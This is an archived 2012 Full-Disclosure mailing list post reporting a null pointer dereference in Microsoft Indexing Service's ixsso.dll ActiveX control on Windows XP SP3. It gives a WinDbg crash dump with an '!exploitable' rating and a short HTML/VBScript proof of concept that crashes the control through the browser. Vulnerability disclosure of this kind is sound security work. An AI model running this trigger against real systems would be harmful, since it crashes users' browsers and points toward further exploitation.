lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CADe7mMdAweayCFKyC1yv+j6R+V-=RLgSVmT+6_aLV2_Dz6RiWQ@mail.gmail.com> Date: Fri, 24 Aug 2012 01:57:42 -0700 From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com> To: full-disclosure@...ts.grok.org.uk Subject: Microsoft Indexing Service Server-side null pointer dereference Exploit Title: Microsoft Indexing Service Server-side (ixsso.dll) null pointer dereference Crash : http://img836.imageshack.us/img836/7742/microsoftf.png Date: 2012-08-24 Author: coolkaveh coolkaveh@...ketmail.com Https://twitter.com/coolkaveh Vendor Homepage: http://http://www.microsoft.com/ Version: 5.1.2600.5512 Tested on: windows XP Sp3 ENG Greets To Mohammad Morteza Sanaie sanaie.morteza@...il.com ----------------------------------------------------------------------------------------- Class CissoQuery GUID: {A4463024-2B6F-11D0-BFBC-0020F8008024} Number of Interfaces: 1 Default Interface: IixssoQuery RegKey Safe for Script: True RegkeySafe for Init: True ----------------------------------------------------------------------------------------- Report for Clsid: {A4463024-2B6F-11D0-BFBC-0020F8008024} RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller ----------------------------------------------------------------------------------------- (c8c.85c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=02e126d0 ecx=774fef18 edx=0020e5ea esi=0020e5c4 edi=00000000 eip=65da3d35 esp=02a4f070 ebp=02a4f098 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ixsso.dll - ixsso!DllCanUnloadNow+0xeac: 65da3d35 8b08 mov ecx,dword ptr [eax] ds:0023:00000000=???????? Missing image name, possible paged-out or corrupt data. 0:012> !load winext\msec.dll 0:012> !exploitable -v HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\OLEAUT32.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\mshtml.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\vbscript.dll - Exception Faulting Address: 0x0 First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception Sub-Type: Read Access Violation Faulting Instruction:65da3d35 mov ecx,dword ptr [eax] Basic Block: 65da3d35 mov ecx,dword ptr [eax] Tainted Input Operands: eax 65da3d37 lea edx,[ebp+8] 65da3d3a push edx 65da3d3b push offset ixsso+0x1400 (65da1400) 65da3d40 push eax Tainted Input Operands: eax 65da3d41 mov dword ptr [ebp+8],edi 65da3d44 mov dword ptr [ebp-0ch],edi 65da3d47 mov dword ptr [ebp-8],edi 65da3d4a mov dword ptr [ebp-4],edi 65da3d4d call dword ptr [ecx] Tainted Input Operands: ecx, StackContents Exception Hash (Major/Minor): 0x3716130a.0x43133e77 Stack Trace: ixsso!DllCanUnloadNow+0xeac OLEAUT32!DispCallFunc+0xc3 OLEAUT32!DispCallFunc+0x6d2 OLEAUT32!DispInvoke+0x23 ixsso!DllCanUnloadNow+0x391 mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc86d3 mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8ce9 mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8736 vbscript!DllGetClassObject+0x12b6d vbscript!DllGetClassObject+0x12ae0 vbscript!DllGetClassObject+0x12a81 vbscript+0x3da8 vbscript+0x40bf vbscript+0x6412 vbscript+0x6397 vbscript+0x6bed vbscript+0x6de5 vbscript!DllCanUnloadNow+0x15b6 vbscript+0xa306 mshtml+0xa195b mshtml+0xa1804 mshtml+0xa18f0 mshtml+0xa06f5 Instruction Address: 0x0000000065da3d35 Description: Data from Faulting Address controls Code Flow Short Description: TaintedDataControlsCodeFlow Exploitability Classification: PROBABLY_EXPLOITABLE Recommended Bug Title: Probably Exploitable - Data from Faulting Address controls Code Flow starting at ixsso!DllCanUnloadNow+0x0000000000000eac (Hash=0x3716130a.0x43133e77) The data from the faulting address is later used as the target for a branch. -------------------------------------------------------------------------------------------------------------------------------------------------------- <html> Exploit <object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target' /></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\ixsso.dll" prototype = "Property Let OnStartPage As object" memberName = "OnStartPage" progid = "Cisso.CissoQuery" argCount = 1 Set arg1=Nothing target.OnStartPage arg1 </script> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists